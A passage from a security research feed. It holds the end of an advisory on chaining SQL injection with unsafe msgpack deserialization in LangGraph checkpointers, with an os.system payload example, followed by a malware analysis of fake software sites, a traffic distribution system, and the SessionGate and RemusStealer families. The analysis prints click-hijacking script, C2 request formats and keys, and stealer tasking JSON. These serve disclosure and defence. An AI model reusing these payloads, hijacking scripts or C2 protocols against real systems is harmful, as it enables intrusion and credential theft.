                data, ext_hook=_msgpack_ext_hook, option=ormsgpack.OPT_NON_STR_KEYS
            )
            # module, name, arg
            return getattr(importlib.import_module(tup[0]), tup[1])(tup[2])
        except Exception:
            return

When an attacker controls the serialized data, they control both the extension code and the data bytes.

The vulnerability

If we pass a msgpack with EXT_CONSTRUCTOR_SINGLE_ARG code, and the tuple:

  1. os
  2. system
  3. Command (“echo PWN > /tmp/pwned.txt” for example)

When this line executes:

return getattr(importlib.import_module(tup[0]), tup[1])(tup[2])

It will:

1. Import the os module

2. Get the system function from it

3. Call os.system("echo PWN > /tmp/pwned.txt")

This gives an attacker arbitrary code execution – by calling os.system() with attacker-controlled commands, they can execute any shell command on the server.

The Attack Chain: Combining Both Vulnerabilities

Now let’s walk through how an attacker chains these two vulnerabilities together to achieve remote code execution.

The Entry Point: When a developer exposes get_state_history(), it internally calls the checkpointer’s list() method to retrieve historical checkpoints:

def get_state_history(
    self,
    config: RunnableConfig,
    *,
    filter: Optional[Dict[str, Any]] = None,
    before: Optional[RunnableConfig] = None,
    limit: Optional[int] = None,
) -> Iterator[StateSnapshot]:
    # ...
    for checkpoint_tuple in self.checkpointer.list(config, filter=filter, before=before, limit=limit):
        # Process and return checkpoint data

If the filter parameter comes from user input without sanitization, an attacker controls the dictionary keys passed to the SQL injection vulnerability.

The Attack Flow

1. Craft Malicious Payload: The attacker prepares a msgpack payload containing instructions to execute arbitrary code (e.g., run a shell command).

2. Exploit SQL Injection: The attacker sends a malicious filter parameter that exploits the SQL injection vulnerability. This injection adds a fake checkpoint row to the database query results, where the checkpoint column contains their malicious msgpack payload.

3. Trigger Deserialization: When the application processes the query results, it encounters the injected fake checkpoint and deserializes the malicious msgpack data.

4. Code Execution: The unsafe deserialization executes the attacker’s payload, giving them remote code execution on the server.

Vulnerability #3: SQL Injection in the Redis Checkpointer (CVE-2026-27022)

The same injection class affects langgraph-checkpoint-redis: user-controlled keys in the filter dictionary are interpolated directly into the query instead of bound as parameters. Preconditions match CVE-2025-67644 (the application exposes get_state_history() with a user-controlled filter and uses the Redis checkpointer). Patched in langgraph-checkpoint-redis 1.0.2.

Additional SQL Injection Findings

Beyond the primary SQL injection in the filter parameter, we identified additional defense-in-depth SQL injection issues in both the SQLite and PostgreSQL checkpointers. These involved direct concatenation of integer values (such as LIMIT and ttl parameters) into SQL queries instead of using parameterized bindings.

Since Python doesn’t enforce type hints at runtime, these parameters could still accept malicious string input. We worked with the LangChain team during disclosure to remediate these issues using parameterized queries.

Disclosure Timeline

2025-11-19: CVE-2025-67644 (SQL injection), CVE-2026-28227 (msgpack deserialization) And CVE-2026-27022 (Redis injection) disclosed to LangChain team

2025-12-10: CVE-2025-67644 fixed and publicly released in langgraph-checkpoint-sqlite 3.0.1

2026-02-20: CVE-2026-27022  fixed and publicly released in langgraph-checkpoint-redis 1.0.2

2026-03-05: CVE-2026-28277  fixed and publicly released in langgraph-checkpoint 4.0.1

Note on Vendor Response

The LangChain team responded quickly to fix the critical SQL injection vulnerability, which effectively breaks the attack chain described in this research. They continue to work methodically on additional remediation efforts, including the msgpack deserialization issue.

Additional Research

There was significant community research into LangGraph security during November and December 2025. Other security researchers independently discovered CVE-2025-67644 and CVE-2026-28277. Full credits can be found in LangChain’s security advisories.

The post From SQLi to RCE – Exploiting LangGraph’s Checkpointer appeared first on Check Point Research.

Received — 8 June 2026 Check Point Research

Impersonation, Click Hijacking, and TDS: Inside a Malware Distribution Ecosystem

3 June 2026 at 15:21

Research by: Alexey Bukhteyev

Key Takeaways

  • Check Point Research investigated a large-scale operation that impersonates open-source and freeware projects to capture search traffic, including lookalikes for researcher and security tooling such as Ghidra, dnSpy, and SpiderFoot. The sites are well-designed and often look like legitimate project portals at a glance, sometimes referencing real upstream resources. The deception is not in the page content alone, it’s in what happens when a user interacts.
  • Our analysis shows these pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.
  • The observed ecosystem appears to be built primarily for traffic acquisition and monetization, likely leveraging legitimate ad-tech and monetization tooling, while downstream redirect chains repeatedly led selected users to malware delivery infrastructure.
  • The downstream branches we analyzed led to multiple malware families, including RemusStealer, AnimateClipper, and the SessionGate framework, which we observed delivering PUA (Potentially Unwanted Applications), suggesting this was not an isolated malicious redirect.

Introduction

When we search Google for a popular piece of software, we usually click the first result, sometimes without even looking at the rest, because official project sites tend to rank highest and appear near the top of the results.

After landing on a site with a professional design and links that appear to point to the project’s official GitHub repository, most users intuitively trust it and proceed to download and run the installer without a second thought. Nothing seems suspicious: the first link in Google, a polished “official-looking” website, and references to the real project. What could go wrong?

Check Point Research investigated a large-scale campaign in which malicious and unwanted software is distributed through a gated traffic-routing stack. The operation relies on professionally built open-source and freeware impersonation sites, where click events initiate routing through a Traffic Distribution System (TDS) — a traffic-filtering and redirection layer that can send different users to different destinations based on factors such as geography, device type, browser fingerprint, or campaign rules — and can ultimately lead to payload delivery.

What makes this campaign especially notable is the choice of brands: a high-risk subset of sites impersonates trusted reverse-engineering tools such as Ghidra and dnSpy, used by security researchers and malware analysts.

Figure 1 – Impersonated websites of popular software tools

The broader phenomenon of websites impersonating popular open-source and freeware projects had already been documented by late 2025. In November 2025, Fullstory reported a large cluster of such fraudulent domains and did not identify direct abuse in their examined samples at the time (including checking hosted archives against known-good content), while emphasizing the clear security risk and the potential for downstream phishing or watering-hole style abuse.

Our findings show that this ecosystem has evolved. We observed that by at least December 2025, the sites in this cluster had TDS scripts embedded into their workflow, and from early January 2026 onward, we recorded active malware distribution via the same infrastructure.

The scale is reflected in VirusTotal telemetry: more than 5,000 total submissions across relevant samples, indicating substantial reach in just the subset visible through public sharing. The real exposure is likely significantly higher.

Figure 2 – VirusTotal total submitters exceeding 5,000, indicating the scale of the operation.

Among the payloads distributed through this TDS infrastructure, we identified several malware families:

  • SessionGate — A previously unknown multi-stage loader with heavy obfuscation and extensive anti-analysis mechanisms, which makes obtaining the final payload extremely difficult. In the chains we observed, it was used to deliver potentially unwanted applications (PUA). We examine SessionGate more deeply later on this article.
  • RemusStealer — a newly emerged infostealer designed to steal data from more than 20 browsers and targeting hundreds of browser extensions and applications, including cryptocurrency wallets, two-factor authentication tools, and password managers.
  • AnimateClipper — A cryptocurrency clipper capable of hijacking transactions across more than 20 blockchain ecosystems.

Importantly, we do not assess these impersonation sites as being built exclusively for malware distribution. The more plausible primary objective is traffic acquisition and monetization. However, by embedding a gated TDS layer and funneling search traffic into it, the operators become part of a distribution chain whose downstream consumers can include malware distributors. The same traffic pipeline that drives gray monetization can also selectively route real users to malicious payloads.

Impersonation, click hijacking, and the post-click routing

Our investigation started with several domains impersonating official project pages and download portals for tools widely used by security researchers.

For relevant queries, some of these “project portals” appeared surprisingly high in search results:

Figure 3 – Fake Ghidra project website in Google search results

What these sites have in common is a shared staging component: their pages load CloudFront-hosted Traffic Distribution System scripts from Amazon CloudFront, a legitimate content delivery network (CDN) service widely used to distribute web content through globally distributed infrastructure. These scripts turn the first “Download” click into a post-click routing chain.

The scripts are fetched from URLs with a consistent pattern, for example:

  • https://d33f51dyacx7bd.cloudfront[.]net/?aydfd=1237183
  • https://dcbbwymp1bhlf.cloudfront[.]net/?wbbcd=1236609

In total, we identified more than 100 currently active websites embedding these scripts, reusing the same campaign-style identifiers and the same CloudFront domains.

Below are some of the entry domains from the cluster, with an emphasis on impersonated brands that are commonly trusted by technical users:

  • Security/researcher tooling look-alikes
    • ghidralite[.]com
    • dnspy[.]org
    • ilspy[.]org
  • Developer/utility tooling look-alikes
    • grpcurl[.]com
    • mqttexplorer[.]com
    • mfcmapi[.]com
    • winsetupfromusb[.]org
    • crystaldiskmark[.]org
    • guiformat[.]com

While we have identified multiple targets that seems to primarily target security researchers, we have not found any strong evidence suggesting we could be dealing with potential targeted attacks. As previously mentioned, ultimate goal seems primarily for traffic acquisition and monetization.

Download button click hijacking

The key trick used on these fake websites is that the “Download” button can look legitimate even to a careful user. The page keeps the original href intact, often pointing to a real upstream destination such as a GitHub release, which means browser UI cues like the status bar on hover still show a plausible target.

Figure 4 – Hovering over the download button reveals the legitimate GitHub repository URL.

At the same time, once the user interacts with the page, the previously loaded CloudFront-hosted JavaScript can intercept the first eligible user interaction and hand it off to a Traffic Distribution System (TDS). The script contains multiple browser-side serving methods — alternative strategies for opening or navigating a tab/window to the TDS-controlled destination.

The default serving method is supplied in the configuration, while the browser-side runtime can still adapt locally based on factors such as browser family, mobile vs. desktop environment, frequency-capping state, and adblock-related logic. In practice, these methods differ mainly in how they preserve a browser-accepted, user-initiated opening opportunity and deliver the final TDS URL. The runtime includes several approaches, including calling a cached reference to window.open, using different primary events in different browsers, opening intermediate or temporary blank tabs that are later navigated to the final URL, or using a synthetic click on a dynamically created <a target="_blank"> element whose javascript: URL assigns window.location.href to the TDS URL.

For example, on desktop Firefox the runtime uses a capture-phase click handler; on desktop Chrome, the corresponding primary event is mousedown. The handler records the user’s intended destination if the interaction occurs inside a link, generates a TDS runtime URL, invokes the selected serving method, and then takes over the original interaction by calling preventDefault() to cancel the normal navigation and stopImmediatePropagation() to prevent other handlers from processing the same event.

A simplified version of the common event-wrapper logic is shown below. The exact invoke() implementation depends on the selected serving method.

const cachedOpen = window.open;

document.addEventListener(isChromeDesktop() ? "mousedown" : "click", (event) => {
  const method = currentServingMethod();
  if (!isEligibleClick(event.target)) return;

  const runtimeUrl = generateRuntimeURL({
    referrer: location.href,
    userDestination: extractClickedLink(event.target)
  });

  method.invoke(cachedOpen, runtimeUrl, event);

  event.stopImmediatePropagation();
  event.preventDefault();
}, true);

The routing logic is also gated by browser-side state and frequency caps, including values stored in localStorage. This creates a reproducibility trap: the first eligible click may route through the TDS chain, while refreshes, repeated clicks, or return visits can fall back to the original visible link target. The script also forwards the clicked link destination downstream, allowing the routing layer to know what the user appeared to be trying to open.

In other words, a click on what appears to be a legitimate link or download button can be converted into a navigation to a completely different URL controlled by the TDS.

window.addEventListener(browser.isChrome() ? "mousedown" : "click", function () {
  w = window.open("about:blank", /* ... */);
});

document.addEventListener("click", function (e) {
  const el = e.target.closest("a, button");
  if (!el) return;

  e.preventDefault();
  e.stopImmediatePropagation();

  window.g(/* ... */, selectedPostClickUrl);
}, true);

window.g = function(/* ... */, u) {
  w.location.href = u;
};

Real redirect chains: gating and branching outcomes

After the click handoff, the workflow becomes visible as a sequence of redirects. We observed numerous redirect chain variations. In many cases, repeated attempts to enter the TDS chain from the same IP address resulted in downloads of benign software (for example, the Opera browser). Some chains ended with the delivery of unnecessary, yet non-malicious, browser extensions.

At the same time, other redirect paths ultimately led to the download of malware.

Figure 5 – Some of the observed redirect chains across the TDS infrastructure.

In all of our experiments, the browser was first redirected to a post-click redirector:

oundhertobeconsist[.]org/<token>

However, this domain is not hardcoded in the page or the scripts. It is supplied dynamically through the decoded stage configuration delivered from CloudFront, together with other campaign parameters.

A decoded configuration block observed in multiple cases contained:

{
  "tagId": 1230479,
  "redirectorDomain": "oundhertobeconsist.org",
  "pixelDomain": "ukentaspectsofc.org",
  "capPerDomain": 2,
  "capPerUri": 1,
  "intervalBetweenPops_ms": 60000,
  "resetInterval_sec": 43200,
  "extraCloudFront": "//d2f5h9m0jmnhjh.cloudfront.net",
  "namespace": "xcvmsbcmxa"
}

The redirector then forwarded the browser along one of several possible branches. Some of the observed variants include:

  • In one family of redirect chains, users were sent directly to an offer wall / content locker (unlockcontent.org), which may result in affiliate-tagged downloads of legitimate software or potentially unwanted applications (PUA).
  • In another family, users were redirected into a multi-gate chain (trkscope[.]xyz, file-enter-web[.]com) before reaching the final delivery infrastructure.

The multi-gate path introduces a second branching point after the anti-bot gate (file-enter-web[.]com). From there, sessions can be routed either to a download gate with direct archive delivery (media.stellarcloudhub1[.]cfd, arch2.maxdatahost1[.]cyou) or to a different gated path that bridges to external hosting platforms (observed ending at mega.nz).

The specific redirect path appears to be influenced by multiple factors, including the user’s country, browser type, VPN usage, client fingerprint, click context, and the original entry domain.

SessionGate: From “Benign Installer” to a Gated, Multi-Stage Framework

We have uncovered several malware families as the final payload, including RemusStealer and AnimateClipper, however, one that stood out was a previously unknown malware we named SessionGate.

SessionGate case drew our attention not only because of its multi-stage delivery chain and extensive validation logic, but also due to a rather unusual anti-analysis approach. Combined with the TDS-side gating, it makes obtaining the final payload extremely difficult for analysts.

VirusTotal telemetry indicates broad reach for this branch. Individual samples associated with SessionGate family were submitted thousands of times, with some reaching approximately 2,000 to 3,500 submissions. The observed submission and lookup activity was distributed globally, with especially notable visibility in Turkey, Poland, Brazil, Germany, France, Russia, and the United Kingdom.

Figure 6 – VirusTotal telemetry (submissions and lookups) for an SessionGate sample.

We believe the TDS chain includes a backend service that “registers” the victim’s IP address, after which the victim must traverse the entire redirect path end-to-end. The payload delivered at a later stage appears to be unique per client, generated server-side for each session, and intended for one-time execution. The embedded modules within that payload are encrypted, and the decryption key material is produced based on data provided by the C2 server only once for that specific sample. As a result, a complete decryption and analysis is only possible if the researcher’s environment does not raise suspicion at any stage, and the analyst manages to fully intercept and decrypt all relevant traffic.

In addition, each stage employs obfuscation techniques that effectively undermine static analysis tooling (disassemblers and decompilers) and can even hinder AI-based reverse-engineering agents.

The figure below schematically illustrates the delivery sequence, C2 communication, and the module decryption flow.

Figure 7 – PUA branch infection chain

We identified two landing pages that initiate the download of samples belonging to this family:

originaldownloads[.]info
getfluxfile[.]com

The landing pages look as follows:

Figure 8 – Two landing pages observed delivering SessionGate samples.

Each landing page generates a short-lived, unique payload download URL per client session, bound to the client’s browser and IP address. Examples of generated URLs include:

https://s3.us-east-2.amazonaws[.]com/marketstagofortdas/ehjm145uvt/Download_Ready_461049.html?utm_source=partner_consent
https://s3.us-east-2.amazonaws[.]com/activeslatnascdngetrcv/wstq162fmo/SetupFile_839132.html?utm_source=partner_consent

The HTML page contains obfuscated JavaScript that performs a server-side validation step (performed by

https://javascriptapiusa[.]com/lic?) before allowing access to the payload. The payload is then downloaded using the same name but with .exe extension, for example:

https://s3.us-east-2.amazonaws[.]com/marketstagofortdas/ehjm145uvt/Download_Ready_461049.exe

As observed, different S3 buckets may be used. Below are some of those identified by us between January and March 2026:

["activeslatnascdngetrcv", "globalhasigasnaledsftwre", "marketstagofortdas", "activesltnascdngetrcv", "globalhsigasnaledsftwre", "dimarketorotacti", "softmakreplnt", "softmakreplntl", "activemktsolution", "dimarketorotactis", "signedmarkeotk", "marketstgofortdas"]

Downloader with a built-in decoy: embedded 7-Zip SFX content

The loader contains an embedded 7-Zip archive, and it can pivot to a benign installer experience when its gated delivery path does not proceed.

This decoy design matters operationally: analysts and automated sandboxes often observe a “normal installer” UI, while the malicious delivery chain remains gated.

One of the first red flags is that the downloaded archive is about 20 MB, yet it contains a file of only 15 MB. The remaining ~5 MB consists of heavily obfuscated loader code.

Figure 9 – The contents of the SFX archive.

Because of the obfuscation techniques in use, including injected junk code, opaque predicates, and string encryption, the resulting functions become extremely bloated. This alone significantly complicates analysis, as it can break parts of common tooling, including IDA’s decompiler and even graph mode. Some functions exceed 500 KB in size.

In addition, encrypted string blobs are placed directly inside function bodies after conditional branches (opaque predicates). This causes disassemblers to misinterpret the string data as executable code, which further disrupts analysis and can prevent tools from correctly identifying function boundaries in the first place.

Figure 10 – Bogus math, opaque predicates and encrypted strings in the analyzed samples

However, this obfuscation method is very characteristic and follows the same patterns, allowing for easy identification of other samples of this family.

The sample also runs multiple environment checks that influence whether it proceeds with malicious delivery or falls back to decoy behavior. The loader checks for the presence of certain services, but the service names are not stored plainly. Instead, it compares Adler-32 hashes against constants, effectively hiding the indicator list.

The identified service name indicators include:

  • eelam, ehdrv, eamonm, epfwwfp, epfw, ekbdflt, edevmon
  • npf, npcap, sysmondrv

In addition to services, the loader also enumerates running processes (Toolhelp-based scanning). Here too, the indicators are not kept as plaintext: they are compared via hash-based logic (SHA1 table approach), again reducing the value of simple string hunting.

Finally, the loader checks system context such as:

  • Windows Defender PUA/PUS-related registry settings (e.g., PUAProtection, MpEnablePus)
  • Windows “Enterprise” edition detection (by inspecting the ProductName string)

Taken together, these checks ensure that malicious activity is only launched on systems where it is most likely to go undetected.

Stage 1: The Loader’s C2 – Multi-Step “Check-in” With Gating

Once executed, the loader attempts to contact its C2 and perform several check-in steps before it tries to retrieve the next-stage payload.

In the campaigns we analyzed, one observed C2 domain was:

  • appfreshstart[.]com

We also observed related campaigns using domains such as:

  • appgetonline[.]com
  • webinnosetup[.]com
  • appmakingcenter[.]com

The loader’s C2 requests use a distinctive URL structure consisting of multiple path segments and a query suffix, and uses a specific User-Agent string NSIS_InetLoad (Mozilla). The pattern looks like:

https://<c2>/<tokenA>/<tickA>/<tokenB>/<tickB>?<sig16><timestamp>

The values in the <tokenX> fields are stored enrypted in the sample and are unique per campaign. They are also used to identify specific stages, for example:

  • check-in;
  • check-in after privilege elevation;
  • payload request.

When constructing the URL, the loader incorporates random tick-derived values, a timestamp, and a signature calculated as SHA1({base_path}/{timestamp}/{salt}), where salt is a shared secret known to both the sample and the server.

In the analyzed sample, salt = "118107B05C590076239FF759CD9E5".

Example request:

GET https://appfreshstart.com/06A3AEF73537C68C/00507206521/26203FA83EC99DDE/77035662512?FF584F0057B9F6F81770356625 HTTP/1.1
Host: appfreshstart.com
User-Agent: NSIS_InetLoad (Mozilla)
Accept: /

For check-in requests, the server responds with a hex string. The loader then sums all decimal digits in that string. If the resulting value is even, execution is aborted.

We observed this behavior when attempting to download the payload again from the same IP address, and also when the sample was obtained outside of the intended TDS chain.

Using a similar request structure, but with different tokenA and tokenB values, the loader requests the next-stage payload from the server. At this step, the server can also block delivery: in our experiments, we occasionally received an empty response. In some campaigns, the payload was additionally encrypted.

We observed multiple variants of the loader. In some cases, the downloaded payload was executed directly from memory, while in others it was written to disk. For disk-based execution, the loader creates a temporary directory and file under %TEMP%. The downloaded file is then launched with two command-line arguments, for example:

"<tmp_filename>.exe" 5568725089114413 DNQ5q9t4mVzASXrJMqVsA6/rjdVV12bOaI7kXqemD9uW/eqleH0aqGh/0glYQt1yrXQjkwN7Bm+PzpsNT/VljVIG7R0Kldo/aFDkzhed2jaSbLtANScmGWkY/wSKVVqUVxwlfJQT4D+S6GD4EnFjet8pp1lEWXl+Vg4QY/Wwz5I=

Stage 2: One more 7-Zip SFX archive with a decoy

The second-stage binary is another large Windows GUI executable (usually up to 10MB) that impersonates a legitimate 7-Zip SFX installer. Its string-encryption and code-obfuscation style is highly consistent with other samples in the same delivery framework.

Notably, it contains a PDB path: D:\\code\\cpp-downloader-scb-reg-other\\Plugins\\7ZipDownloader\\Output\\SFXWin.pdb. We used this artifact for pivoting and found 200+ similar samples on VirusTotal, with the earliest ones appearing in late August 2025.

On launch, the sample checks its command line: the first argument must look like a numeric token, and the second must look like a base64 string. The base64 blob is then further decrypted and validated by an embedded module (described later). If the checks fail, the sample falls back to the benign 7-Zip SFX behavior, showing a normal “installer/extractor” flow.

Figure 11 – Very low VT detection rate of the 2nd stage payload samples.

When the gate passes, the binary reads its own on-disk image, extracts two embedded DLL payloads, and decrypts them using AES-CBC. The modules are not written to disk: they are loaded via in-memory PE manual mapping (often referred to as reflective / manual-map loading), and execution is transferred through exported functions.

  • DLL #1 is decrypted first using a key derived locally:
    • key1 = SHA256("WDNkCQnmXc" || tail32) where tail32 is a 32-byte slice from the loader’s file image.
  • After mapping DLL #1, the loader resolves and calls an export named c1, passing the loader’s own SHA-256 hash (uppercase hex string) and an output buffer.
  • The output of c1, combined with a second hardcoded string constant, is used to derive the key for DLL #2:
    • key2 = HEX_UPPER(SHA256("webh5vnGVew" || c1_output))
  • The loader then decrypts and maps DLL #2 the same way and calls its exported entry point (observed as mainFunc), passing through the original command-line arguments.

However, we encountered major problems while decrypting DLL #2. The problem is that the output of function c1 is not static, but depends on the data returned by the C&C server.

DLL #1 – “Key Broker” module

After the stage-2 SFX loader decrypts and maps DLL #1 in memory, it resolves and calls an exported function named c1. From the loader’s point of view, DLL #1 acts as a key broker: it performs strict gating based on the process command line, contacts a dedicated “CRC” C2 endpoint, transforms the server response into a short token, and returns it to the loader. The loader then mixes this token with a hardcoded value to derive the AES key material for decrypting DLL #2.

Command-line gating

First, the module performs the same command line check as the parent executable: the first argument must look like a numeric token, and the second must look like a base64 string.

Then it decodes the base64 string from the second command line argument using AES-256-CBC with a fixed hardcoded key BFEA4EE8EF934BE7A2B4C64A0BAD1E92 (32 bytes; not hex-decoded) and a zero IV.

It skips the first 32 bytes and treats the remaining bytes as a UTF-16 string. In the samples we analyzed, this string holds a path-like marker such as:

C:\\Users\\user\\Desktop\\SetupFile_411815.exe

The decrypted value is then validated by checking the filename suffix pattern: the filename must contain an underscore followed by 3-10 lowercase alphanumeric characters, and end with an extension (e.g., _411815.exe). This check is important operationally: it prevents the module from functioning correctly when executed outside of the intended delivery flow. If any of these checks fail, the DLL exits early and returns no usable output, that leads to the loader’s “benign SFX fallback” flow.

In addition to command-line gating, DLL #1 runs lightweight anti-analysis checks. In particular, it checks the local environment against hardcoded blacklists derived from:

  • SHA-256 of the current username and computer name, and
  • MD5 hashes of ntdll.dll export names (a common way to detect non-standard runtime environments such as emulation layers or heavily instrumented sandboxes).

When any blacklist condition matches, the module aborts before contacting its key server.

Key request: C2 receives the loader’s hash, returns per-build token material

If the gate passes, DLL #1 contacts a dedicated “CRC” C2 domain (observed variants include):

  • yourfastcrc[.]com
  • mobileversioncrc[.]com
  • webcrcprove[.]com
  • integritycrc[.]com

The request follows a consistent pattern:

https://<crc-domain>/check_version?version=<hash>

The value passed in version= contains the uppercase SHA-256 hex hash of the stage-2 loader itself and is provided by the stage-2 loader when calling c1.

The C2 response is a short ASCII string, for example:

qWTL9kRfF3ndz5UGs3jPWsriG4yFfRnvZxffshBIunIBDFwVfgGbGFUjpTJaFwBB

DLL #1 uses the first 64 characters and performs a deterministic transformation to produce a 32-character base62 token, which it returns to the loader via the output buffer. For the example above, the resulting value is:

q2lOy0GwLqW1yRwIYAzH33CjBV9PoRrA

The loader then combines this c1 output with a hardcoded constant to derive the AES key material for DLL #2.

Implication: per-client, one-time keys and strong server-side gating

In controlled experiments, we repeatedly observed that the “CRC” C2 endpoint can return different values across requests for the same version=<hash>. This behavior aligns with the broader design of the campaign:

  • The stage-2 payload appears to be generated per client session, and
  • DLL #2 cannot be decrypted unless the correct c1 output is obtained for the matching build.

Based on traffic captures and repeated retrieval attempts, our working assessment is that the “CRC” C2 likely implements one-time key release semantics and additional gating tied to victim context, such as the originating IP address / session state. In practice this means:

  • the correct key material may be released only once for the intended victim session, and
  • subsequent requests (or requests from a different IP) may be answered with a valid-looking but non-functional random string, causing the stage-2 loader to decrypt DLL #2 into garbage rather than a valid PE image.

This design significantly complicates research. Even when an analyst captures a full redirect chain and obtains a sample quickly, the server-side constraints can prevent reliable reproduction of the key exchange needed to decrypt and analyze the final payload (DLL #2).

DLL#2 – Decrypted Payload: The “Installer/Offer Framework” Module

After we succeeded in capturing a clean end-to-end delivery run and decrypting the embedded modules, we obtained a second-stage DLL that implements the real business logic: tracking, configuration retrieval, payload selection, download, and silent execution.

This section describes that decrypted module and its capabilities.

In this sample, we observed the same code patterns and obfuscation techniques as in all previously analyzed modules, which clearly indicates that they belong to the same malware family.

The decrypted payload is best described as a network-controlled installer/bundler framework. It is designed to look and behave like a legitimate installer when observed superficially, while quietly performing a server-driven download-and-execute workflow in the background.

Importantly, we did not observe stealer or RAT behavior in this module: there is no evidence of credential theft, browser database scraping, keylogging, or interactive remote control. Instead, the module is intended for configurable delivery (server-controlled payload URLs), and silent installation of additional software.

From a defensive perspective, this still makes it high-risk. Any component that can fetch configuration from a remote server and then download and execute binaries on demand is a delivery primitive that can be abused to distribute malware.

A quick map of the core workflow

At a high level, the DLL implements the following pipeline:

  1. Build encrypted request.
  2. Retrieve encrypted config from C&C server (appmakingcenter[.]com in the analyzed sample).
  3. Decode config into key/value table, fetch download URL.
  4. Download payload.
  5. Execute silently via cmd.exe .
  6. Send telemetry/tracking events

The implementation is structured around a small set of reusable building blocks:

  • an encrypted “panel protocol” over HTTPS,
  • a configuration decoder and parser,
  • downloaders,
  • a silent process launcher,
  • multiple tracking/telemetry helpers.
Figure 12 – C&C domain, and endpoints in the decrypted strings.

What software does it appear to install?

The decrypted module contains many product-facing strings (installer UI text, product names, and expected post-install executable paths under AppData\\Local\\Programs\\...). At first glance, this looks like a hardcoded “bundle portfolio” (PDF Spark, PDF Proton, PDF Ignite, PDF Skill, Document Sparkle, NibblrAI, PCPooch). However, as we described above, the DLL is a multi-product installer shell driven by server configuration, not a collection of fixed download links.

Figure 13 – The list of products that can be installed.

Concretely, the module retrieves an encrypted backend configuration, decodes it into an internal key/value table, and then:

  • uses a numeric product identifier from the table (config key 22) to select which product branding/UI texts to display, and which expected executable path to use for post-install launch (via CreateProcessW);
  • uses a download URL from the same table (config key 11, PRODUCT_DOWNLOAD_URL) as the input to its WinINet downloader.

This design explains why you can see many product names and installation paths in the DLL while not seeing their download URLs as plaintext: the URLs are supplied dynamically by the backend.

Finally, if the backend config is missing key 11, the parser initializes PRODUCT_DOWNLOAD_URL to a hardcoded 7-Zip installer URL (https://www.7-zip.org/a/7z2301-x64.exe), which can be overridden by a full server response.

Case 2: RemusStealer

In the second case we analyzed, the TDS redirection chain ends with a landing page that provides a link to download a password-protected ZIP archive and the password required to open it.

Figure 14 – Link for downloading a password protected archive.

The archive is approximately 14 MB, but after extraction it contains a single executable whose on-disk size is about 850 MB. The file is artificially inflated by large zero-filled padding: the actual non-zero content is roughly 32 MB once the padding is removed.

This inflation is a practical evasion technique. Oversized binaries can slow down or break automated processing (static unpacking, AV scanning pipelines, sandbox analysis) and can also bypass tooling or policies that impose file-size limits or timeouts during analysis.

The executable itself is a first-stage loader written in Go. It contains an embedded malicious payload in .rdata that is decoded at runtime using a simple transform, and is executed via manual PE mapping.

Payload: Remus Stealer

The embedded second-stage payload is a C2-controlled infostealer marketed as Remus (a MaaS stealer). The first public listing we observed for “Remus” was posted on a Russian-language underground forum by a user named RemusStealer on February 12, 2026.

According to the vendor advertisement, Remus is positioned as a subscription product (two tiers advertised at $250 and $500) with a focus on broad browser and extension collection, a custom exfiltration protocol with encryption, and heavy use of low-level OS interaction (“system calls”).

Figure 15 – RemusStealer panel screenshot (from Remus ads)

RemusStealer implements the following functionality:

  • C2-driven collection (“tasking”): the server defines what is collected per run by sending encrypted JSON tasks; multiple tasks can be executed sequentially until the server signals completion.
  • Browser data theft:
    • Chromium family: History, Login Data, Login Data For Account, Network\\Cookies, Web Data
    • Firefox/NSS profiles: key4.db, cert9.db, cookies.sqlite, logins.json, formhistory.sqlite, places.sqlite, prefs.js, extensions.webextensions.uuids
    • Chromium key material: extracts the master key from Local State via DPAPI (CryptUnprotectData) and uploads it as a separate /Key artifact.
  • Extension-driven theft: the server can pass an explicit list of extension targets (extensions[] objects with {name, path}), allowing selective collection.
  • File system search + exfiltration: server-controlled search rules (path, mask, depth, size limit, link handling) with %ENV% expansion (e.g., %APPDATA% paths).
  • Registry reconnaissance: server-controlled queries of arbitrary path/value pairs, with HKCU-relative support and WOW64 view retry logic.
  • Clipboard theft: captures CF_UNICODETEXT, exfiltrated as Clipboard.txt (collected once per run).
  • Screenshot capture: supported and exfiltrated as Screenshot.bmp when enabled by an internal flag (not unconditional in this build).

Operationally, this architecture gives the operator fine-grained control over collection scope. For example, the backend can define which browser extensions to target, which file name patterns to search for, which registry values to query for environment profiling, and so on.

Tasking protocol overview

The binary contains an encrypted C2 list that is decrypted at runtime. In the analyzed sample, the decrypted C2 endpoints were:

  • http://buccstanor[.]pics:28313 (primary)
  • http://baxe[.]pics:48261 (fallback)

The stealer polls the C2 using HTTP POST requests that include an access_token and an incrementing step counter. The requests use a Firefox browser User-Agent string, to blend in with normal browser traffic:

POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 56
Host: baxe.pics:48261

access_token=57fe0587-863c-432d-9f4b-bf785a9560e8&step=1

Each server response is an encrypted JSON object with keys:

  • type — numeric command type (parsed as a number and used as an integer selector)
  • data — command parameters (object or list, depending on type)
  • name — base64 string used by type=0
  • extensions — list of {name, path} objects used by type=3 and type=4
{
  "type": <number>,
  "data": ...,
  "name":"<base64>",
  "extensions": [ {"name":"...", "path":"..."}, ... ]
}

Task responses are delivered as encrypted JSON. After decoding, entries resolve into a label and extension identifier, with occasional control flags (sync, indb) used by the malware logic.

A decrypted example task instructing the stealer to collect Chrome browser extension data looks as follows:

{
  "type":3,
  "extensions": [
    { "name":"Password Managers/1Password", "id":"aeblfdkhhhdcdjpifhhbdiojplfjncoa" },
    { "name":"Password Managers/Bitwarden", "id":"jbkfoedolllekgbhcbcoahefnbanhhlh" },
    { "name":"Wallets/MetaMask", "id":"nkbihfbeogaeaoehlefnkodbefgpgknn", "indb":true },
    { "name":"Wallets/Phantom", "id":"bfnaelmomeimhlpmgjnjophhpkkoljpa" },
    { "name":"2FA/Authy", "id":"gaedmjdfmmahhbjefcbgaolhhanlaolb" }
  ]
}

Notably, the identifiers are not limited to Chrome Web Store-style IDs: the list also contains email-like IDs (e.g., webextension@…) and GUID-style identifiers, suggesting the operator’s targeting list is designed to cover multiple browser ecosystems and packaging schemes.

The agent executes tasks in a loop until the server returns a stop command.

Implemented commands

Task typePurposeExpected fieldsWhat the stealer does
